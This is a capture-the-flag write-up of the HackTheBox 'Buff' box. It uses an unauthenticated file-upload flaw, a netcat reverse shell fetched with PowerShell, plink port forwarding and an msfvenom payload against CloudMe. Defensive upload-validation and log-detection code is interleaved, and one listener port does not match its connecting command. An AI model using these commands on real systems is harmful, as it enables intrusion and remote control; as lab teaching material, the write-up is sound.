Buff is a Windows box that features the website for a gym membership software package and a simple Windows stack-based buffer overflow.
Scanning and Enumeration
The first thing to note about this box is that it seems to have some odd things going on port-wise; an example is below. The only port that should be open is 8080. There isn't anything to do with the other port (7680), and we aren't sure why it shows up consistently.
nightwolf@kali:~/CTFs/HTB/Buff$ sudo nmap -A -p- 10.10.10.198
[sudo] password for nightwolf:
Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-18 13:08 MDT
Nmap scan report for 10.10.10.198
Host is up (0.41s latency).
Not shown: 65533 filtered ports
PORT STATE SERVICE VERSION
7680/tcp open pando-pub?
8080/tcp open http Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)
| http-open-proxy: Potentially OPEN proxy.
|_Methods supported:CONNECTION
|_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6
|_http-title: mrb3n's Bro Hut
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
No OS matches for host
Network Distance: 2 hops
TRACEROUTE (using port 8080/tcp)
HOP RTT ADDRESS
1 82.14 ms 10.10.14.1
2 778.91 ms 10.10.10.198
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 258.90 seconds
It seems there is a web server on port 8080. Let's go take a look.
Rabbitholes
I fell down a rabbit hole to start with. There is an /Admin page that looks like a place where we could perhaps upload a PHP shell.
The file upload is disabled, but we can fix that.
We play around with it a bit but don't seem to make much progress, so we start looking around again.
Foothold
We eventually climb out of the rabbit hole and take a look around the site again. We take a look at /contact.php.
This tells us the name and version of the gym site's web app.
We run a Google search on it and find it has a lovely vulnerability: https://www.exploit-db.com/exploits/48506
This takes advantage of the fact that /upload.php does not check for authentication before allowing uploads. Uploaded files are supposed to be images only, but this check can be circumvented by adding an image extension to the end of our PHP shell's filename.
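The server-side fix comes down to the three things the write-up implies were missing: an authentication check on the upload endpoint, deciding the file type from the bytes rather than from the client's filename, and never letting the client's name (or its trailing extension) decide where or as what the file is stored. The Python below is an added illustration of those checks written for this write-up; it is not the gym application's PHP code, and the session shape ({"user_id": ...}), the size cap, the signature allowlist and the storage directory are all assumptions.

```python
import os
import secrets
import tempfile

# Content signatures the server trusts (constructed allowlist for this example).
IMAGE_SIGNATURES = {
    b"\x89PNG\r\n\x1a\n": "png",
    b"\xff\xd8\xff": "jpg",
    b"GIF87a": "gif",
    b"GIF89a": "gif",
}
MAX_UPLOAD_BYTES = 2 * 1024 * 1024   # assumed size cap for this example


class UploadRejected(Exception):
    """Raised when an upload fails one of the server-side checks."""


def sniff_image_type(data: bytes):
    """Decide the file type from its leading bytes; None if not a known image."""
    for magic, kind in IMAGE_SIGNATURES.items():
        if data.startswith(magic):
            return kind
    return None


def validate_upload(session, data: bytes) -> str:
    """Pure checks, returning the extension the *server* will assign.

    session is a dict-like object; a missing "user_id" means unauthenticated
    (assumed session shape, not the gym app's own).
    """
    if not session or not session.get("user_id"):
        raise UploadRejected("authentication required")
    if len(data) > MAX_UPLOAD_BYTES:
        raise UploadRejected("file too large")
    kind = sniff_image_type(data)
    if kind is None:
        raise UploadRejected("not a recognised image")
    # Defence in depth: a real image with a script body appended still passes
    # the signature check, so refuse an obvious PHP open tag anywhere in it.
    if b"<?php" in data:
        raise UploadRejected("embedded script content")
    return kind


def handle_upload(session, client_filename: str, data: bytes, store_dir: str) -> str:
    """Validate, then store under a server-chosen name in store_dir.

    client_filename is deliberately unused for the path: neither its stem nor
    any of its extensions influence where or as what the bytes are saved.
    store_dir should sit outside the web root (assumed deployment detail).
    """
    kind = validate_upload(session, data)
    stored_name = f"{secrets.token_hex(16)}.{kind}"
    with open(os.path.join(store_dir, stored_name), "wb") as fh:
        fh.write(data)
    return stored_name


# Constructed sample payloads: a minimal PNG-like header and an inert PHP marker.
PNG_SAMPLE = b"\x89PNG\r\n\x1a\n" + b"\x00" * 64
PHP_SAMPLE = b"<?php /* constructed placeholder, never executed */ ?>"


def demo():
    """Run the cases from the write-up's scenario; returns label -> outcome."""
    store = tempfile.mkdtemp()
    cases = [
        ("anonymous_png", {}, "avatar.png", PNG_SAMPLE),
        ("user_png", {"user_id": 7}, "avatar.png", PNG_SAMPLE),
        ("user_double_extension", {"user_id": 7}, "shell.php.png", PHP_SAMPLE),
        ("user_polyglot", {"user_id": 7}, "avatar.png", PNG_SAMPLE + PHP_SAMPLE),
    ]
    results = {}
    for label, session, name, data in cases:
        try:
            results[label] = ("stored", handle_upload(session, name, data, store))
        except UploadRejected as err:
            results[label] = ("rejected", str(err))
    return results


if __name__ == "__main__":
    for label, outcome in demo().items():
        print(f"{label:24} {outcome[0]:9} {outcome[1]}")
```

The double-extension case is rejected by content rather than by a filename rule, which is the point: an extension allowlist on the client's name is what the original endpoint relied on, and it is exactly what the renamed shell slipped past.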
We pull it down, run it, and instantly drop into a php shell.
We are unable to change directories, since our "shell" is actually just a wrapper that sends commands nicely to our uploaded PHP file, but we do have the permissions of the user Shaun, which allows us to retrieve user.txt.
C:\xampp\htdocs\gym\upload> type C:\Users\shaun\Desktop\user.txt
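From the defender's side, the sequence above leaves a distinctive trace in the Apache access log: a POST to /upload.php that no browser form navigated to, followed by requests for a file in the upload directory whose name carries a script extension and a query string. This Python detector is an added example, not part of the write-up or of the application. The log lines are constructed (the addresses come from the write-up; filenames, user agents and PIDs are invented), and the combined log format plus the /upload/ URL mapping for C:\xampp\htdocs\gym\upload are assumptions.

```python
import re

# Apache "combined" log format (assumed format of the XAMPP access log).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

UPLOAD_ENDPOINT = "/upload.php"   # from the write-up
UPLOAD_DIR = "/upload/"           # assumed URL for C:\xampp\htdocs\gym\upload
SCRIPT_EXTS = {"php", "php3", "php4", "php5", "phtml", "phar"}


def parse_line(line: str):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["path"], _, rec["query"] = rec["target"].partition("?")
    return rec


def reasons_for(rec) -> list:
    """Return the detection rules a single request trips (possibly none)."""
    reasons = []
    path, query = rec["path"], rec["query"]
    # Rule 1: the upload endpoint called directly, not from a page in the app.
    if rec["method"] == "POST" and path == UPLOAD_ENDPOINT and rec["referer"] == "-":
        reasons.append("POST to /upload.php without a Referer")
    if path.startswith(UPLOAD_DIR):
        name = path.rsplit("/", 1)[-1]
        exts = [p.lower() for p in name.split(".")[1:]]
        # Rule 2: any script extension anywhere in the name, e.g. x.php.png.
        if any(e in SCRIPT_EXTS for e in exts):
            reasons.append("script extension inside the image upload directory")
        # Rule 3: a static image is never fetched with parameters.
        if query:
            reasons.append("query string on a request for an uploaded image")
    return reasons


def find_suspicious(lines):
    """Return one finding per flagged request, in log order."""
    findings = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        reasons = reasons_for(rec)
        if reasons:
            findings.append({"ip": rec["ip"], "target": rec["target"], "reasons": reasons})
    return findings


# Constructed sample log lines: two legitimate member requests, then the pattern
# a scripted unauthenticated upload and follow-up requests would leave.
SAMPLE_LOG = [
    '10.10.10.55 - - [18/Jul/2020:13:20:10 -0600] "GET /upload/member42.png HTTP/1.1" 200 8192 "http://10.10.10.198:8080/profile.php" "Mozilla/5.0"',
    '10.10.10.55 - - [18/Jul/2020:13:20:12 -0600] "POST /upload.php?id=member42 HTTP/1.1" 200 12 "http://10.10.10.198:8080/profile.php" "Mozilla/5.0"',
    '10.10.14.24 - - [18/Jul/2020:13:30:01 -0600] "POST /upload.php?id=x1 HTTP/1.1" 200 12 "-" "python-requests/2.24.0"',
    '10.10.14.24 - - [18/Jul/2020:13:30:02 -0600] "GET /upload/x1.php.png?cmd=REDACTED HTTP/1.1" 200 33 "-" "python-requests/2.24.0"',
]

if __name__ == "__main__":
    for finding in find_suspicious(SAMPLE_LOG):
        print(finding["ip"], finding["target"], "; ".join(finding["reasons"]))
```

Rule 1 on its own is noisy (some clients strip Referer), so the useful signal is the combination: the same source tripping rule 1 and then rules 2 and 3 within seconds.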
Shell Stabilization
We were able to get our user flag, but we are in a really crappy webshell. We need something better going forward. We download a Windows netcat binary from https://github.com/int0x33/nc.exe/blob/master/nc.exe.
Then we go to the directory it was downloaded to and start a Python HTTP server.
sudo python3 -m http.server 80
We also start a listener with netcat to catch our reverse shell: nc -lnvp 3698
Once our server and listener are up, we use PowerShell to transfer the file over and then use netcat to start our reverse shell.
powershell -c IEX(New-Object Net.WebClient).DownloadFile('http://10.10.14.24/nc.exe', 'nc.exe')
.\nc.exe -e cmd.exe 10.10.14.24 3968
We catch our shell, and it is time to start looking for a way to get to root.
Root
We check the running processes and find one that rather stands out: CloudMe.exe. There is also a copy of this binary in one of the user folders.
We quickly find an exploit on Exploit-DB that seems likely to be applicable: https://www.exploit-db.com/exploits/44470
From conversations with others, this one works as well: https://www.exploit-db.com/exploits/48389
However, there is one challenge: CloudMe does not have a public-facing port. We can see that the port it uses, 8888, is open with the command netstat -an | find /i "listening", but we can't reach it externally. It is only listening for internal (loopback) connections.
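A service that only listens on 127.0.0.1 never shows up in an external scan like the nmap run at the top of this write-up, yet it is reachable by any local process or through a forwarded port, so it still needs patching and privilege review like anything exposed. The Python parser below is an added example rather than anything from the write-up; it classifies each listening TCP socket from Windows netstat output by how widely it is bound. It assumes the output of netstat -ano (the -o adds the PID column that the page's -an omits), and the sample output is constructed with invented PIDs and the ports seen on the box.

```python
# Constructed sample of `netstat -ano` output on the target (PIDs invented).
NETSTAT_SAMPLE = """\
Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:8080           0.0.0.0:0              LISTENING       2204
  TCP    127.0.0.1:8888         0.0.0.0:0              LISTENING       3940
  TCP    10.10.10.198:8080      10.10.14.24:51234      ESTABLISHED     2204
  TCP    [::]:7680              [::]:0                 LISTENING       1232
  UDP    0.0.0.0:5353           *:*                                    1880
"""


def split_endpoint(endpoint: str):
    """Split 'host:port' (IPv4) or '[host]:port' (IPv6) into (host, int port)."""
    host, _, port = endpoint.rpartition(":")
    if host.startswith("[") and host.endswith("]"):
        host = host[1:-1]
    return host, int(port)


def classify(host: str) -> str:
    """How widely a bind address exposes the socket."""
    if host in ("0.0.0.0", "::"):
        return "all-interfaces"
    if host == "::1" or host.startswith("127."):
        return "loopback-only"
    return "specific-interface"


def listening_services(netstat_text: str):
    """Every TCP socket in LISTENING state, with bind scope and owning PID."""
    services = []
    for line in netstat_text.splitlines():
        fields = line.split()
        # Header, blank and UDP lines have no LISTENING state column.
        if len(fields) < 5 or fields[0] != "TCP" or fields[3] != "LISTENING":
            continue
        host, port = split_endpoint(fields[1])
        services.append({
            "port": port,
            "bind": host,
            "scope": classify(host),
            "pid": int(fields[4]),
        })
    return services


def loopback_only(netstat_text: str):
    """The services an external scan will never show but local code can reach."""
    return [s for s in listening_services(netstat_text) if s["scope"] == "loopback-only"]


if __name__ == "__main__":
    for svc in listening_services(NETSTAT_SAMPLE):
        print(f"{svc['port']:>6}  {svc['bind']:<16} {svc['scope']:<18} pid {svc['pid']}")
```

On the sample, 8080 and 7680 match what nmap saw from outside, and 8888 (the CloudMe process in the write-up) is the loopback-only entry: the one an inventory based purely on external scanning would miss.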
We also can't simply run our exploit in our current shell, because this system does not have Python installed. There are probably a few ways around this. We could rewrite the exploit in another language or pack it up into an executable, but I opted to set up port forwarding with plink.
First, we start the SSH service on our attacking machine with sudo service ssh start.
Then we transfer plink over the same way we did for netcat and run .\plink.exe -v -x -R 4444:127.0.0.1:8888 nightwolf@10.10.14.24. The -R option asks the SSH server on our attacking machine to listen on port 4444 and send anything that connects there back through the tunnel to 127.0.0.1:8888 on the target, which is exactly where CloudMe is listening.
We enter our password and plink opens the connection.
HTB SSH Network changes
Not long after I completed this box, HTB made some changes to the types of traffic permitted on their networks. SSH connections from target boxes to player machines are now blocked on port 22.
Because of this we need to take another option. We can change the port used by SSH to a port other than 22, or we can use another tool, such as Chisel.
Root: Continued
Now we just need to set up our payload. First we change the target connection port in the exploit to 4444 to match our port forward, then we generate the shellcode for our reverse shell using msfvenom.
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.24 LPORT=3271 -f c
We start a listener on our local machine with nc -lnvp 3271
Time to cross our fingers and hope it works.
Our connection goes through and our listener catches the reverse shell.
We check and we have Administrator rights. A quick type to snag the flag for submission and we are all done!
Wrapup
This was one of the first boxes I attempted when returning to HTB and I think it was a pretty good box to start with. It has a few rabbit holes that are easy to slip into but is overall fairly easy and straightforward. The port forwarding aspect was pretty fun to learn and I have certainly made use of it later. Thanks egotisticalSW for creating an awesome box!